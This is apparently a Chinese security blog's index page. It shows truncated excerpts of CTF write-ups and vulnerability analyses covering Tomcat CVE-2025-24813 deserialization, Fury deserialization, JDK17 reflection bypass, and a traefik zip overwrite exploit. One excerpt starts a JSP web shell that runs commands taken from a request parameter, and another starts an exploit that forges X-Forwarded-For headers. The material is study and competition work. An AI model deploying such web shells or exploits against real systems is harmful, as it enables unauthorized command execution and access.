A day in AsaL1n

CVE-2025-24813 Tomcat session 反序列化分析受影响版本1239.0.0.M1 <= tomcat <= 9.0.9810.1.0-M1 <= tomcat <= 10.1.3411.0.0-M1 <= tomcat <= 11.0.2 漏洞条件123应用程序启用了DefaultServlet写入功能，该功能默认关闭应用支持了 partial PUT 请求，能够将恶意的序列化数据写入到会话文件中，该功能默认开启应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置，需要额外配置 漏洞复现使用的是apache-tomcat-9.0.98版本。https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip 在conf/context.xml中，添加如下配置，启用session写入功能 123<Manager className\="org.apache.catalina.ses ...

TIMECapsule & justDeserialize 学习动态代理写在最前面 两场比赛的java题目都是属于那种，修复很好修但是很难打 ccb半决赛修复的问题给我很大的教训，改过来之后软件赛在华东赛区拿下fix一血二血 FIX修复的时候需要注意 服务需要手动kill掉对应的题目进程 服务重启的时候需要是使用nohup后台启动，不然当fix的进程被杀死，就会导致启动的服务挂掉，导致修复失败 给出一题的修复脚本 123456#!/bin/shpkill -9 dotnetrm /app/RazorCor.dllmv RazorCor.dll /app/RazorCor.dllnohup dotnet /app/RazorCor.dll & TIMECapsule动态代理​ 代理类在程序运行时创建的代理方式被成为动态代理。代理类并不是在Java代码中定义的，而是在运行时根据我们在Java代码中的“指示”动态生成的。相比于静态代理， 动态代理的优势在于可以很方便的对代理类的函数进行统一的处理，而不用修改每个代理类中的方法。 Java 代理模式详解 | Ja ...

Fury反序列化 网上没找到相关的文章，自己瞎几把分析玩的 官方文档如下 https://fury.apache.org/zh-CN/docs/guide/java_object_graph_guide 依赖 1234567<dependencies> <dependency> <groupId>org.apache.fury</groupId> <artifactId>fury-core</artifactId> <version>0.10.0</version> </dependency> </dependencies> 序列化fury提供了一种不同于jdk原生序列化的方式，被序列化的类不需要实现序列化的接口，直接就可以序列化 例子：序列化的类 12345678910111213141516171819202122232425262728293031323334 ...

Jdk17 反射限制与绕过反射的实现12345678910111213141516171819@CallerSensitive @ForceInline // to ensure Reflection.getCallerClass optimization @IntrinsicCandidate public Object invoke(Object obj, Object... args) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException { if (!override) { Class<?> caller = Reflection.getCallerClass(); checkAccess(caller, clazz, Modifier.isStatic(modifiers) ? null : o ...

脖子疼 2025 N1CTF Juniortraefik存在任意文件解压 这里可以解压到任意目录下，覆盖原来有的内容 这里可以覆盖他的反代配置，然后把flag路由暴露出来 这里限制了flag访问必须要是本地ip，需要伪造 可以设置yaml，中间设置一个中间件，修改所有经过的xff头 exp如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950import zipfile if __name__ == "__main__": try: binary = '''# Dynamic configurationhttp: middlewares: set-x-forwarded-for: headers: customRequestHeaders: X-Forwarded-For: "127.0.0.1" ...

2025SUCTF -WEB 死了 SU_photogallery可以上传一个zip压缩包 404页面长得像php-s 启动的服务，搜搜相关漏洞 https://blog.csdn.net/Kawakaze_JF/article/details/133046885 找到了这个，成功读取了代码 源代码如下 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150 ...

2024 总结现在是2024-12-17 在某节实验课上摸鱼 ​ 前段时间参加了ciscn x 长城杯 的全国初赛，初赛和队友做了两个签到，由于没有misc手，后面就去做威胁分析和流量取证了，做了5题，第六题的时候猜那个挂载的存活，看不懂只能dump字符串出来一个个猜测，结果还没猜对（沟槽的），然后就结束了，这里感谢carbofish师傅的带飞。 ​ 今年还是很有收获的，年初的时候爆学了一段时间的jvav，然后参加了一些比赛。然后就是各种的打比赛，复现，打比赛，复现。有段时间不知道咋回事，有复现不完的题目，复现到后面自己都看的想吐了（和最近刚刚换一下，国赛题还没复现QAQ 不知道什么时候去复现。 ​ 今年圆了去年的梦，成功进入了ciscn的决赛，去年剃头的巅峰极客，今年也成功打进了决赛，虽然因为ycb的时间冲突，没能成功去到线下，不过也很满意了。今年还在newstarctf客串了一回出题人，然后加入了V&N，遇到了很多厉害的师傅。 ​ 随便写点吧，寒假再更新了，最近要狠狠学习编译原理和考研英语了，期末要挂了。。。

2024 强网杯 web 最近有点忙 比赛题目好多都没复现 欸 最后做题情况如下 php platform给了源代码 1234567891011121314151617181920212223242526<?phpsession_start();require 'user.php';require 'class.php';$sessionManager = new SessionManager();$SessionRandom = new SessionRandom();if ($_SERVER['REQUEST_METHOD'] === 'POST') { $username = $_POST['username']; $password = $_POST['password']; $_SESSION['user'] = $username; if (!isset($_SESSION[' ...

2024浙江省省赛 web初赛 这次比赛题目还是比较简单的 我上来就拿了两个血 可惜第三题使用xml加载内存马的时候 脑袋抽了没想出来 可惜了 最后第11名 欸可惜 easyjs 点名了存在原型链污染 污染id=1 的isAdmin为true就行 得到flag 这题不污染也行 乐 hack memory不知道应该干啥 扫一下 直接上传一句话就行 12345678910<% if("poc".equals(request.getParameter("pwd"))){java.io.InputStream in =Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1; byte[] b = new byte[2048]; out.print("<pre>");while((a=in.read(b))!=-1){out.println(new St ...

2024强网拟态 web 我们A1natas最后获得了第30 感觉没希望进线下了 尽力了 不过开心的是我ak了web方向的题目 ez_picker/register存在原型链污染 可以污染任意的黑白名单 这里在register的时候 进行了merge操作 写个简单的demo 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960import sanicfrom sanic import text, Sanic, Request, responsefrom key import secret_keyapp = Sanic("test")users=[]safe_modules = { 'math', 'datetime', 'json', 'collections'
...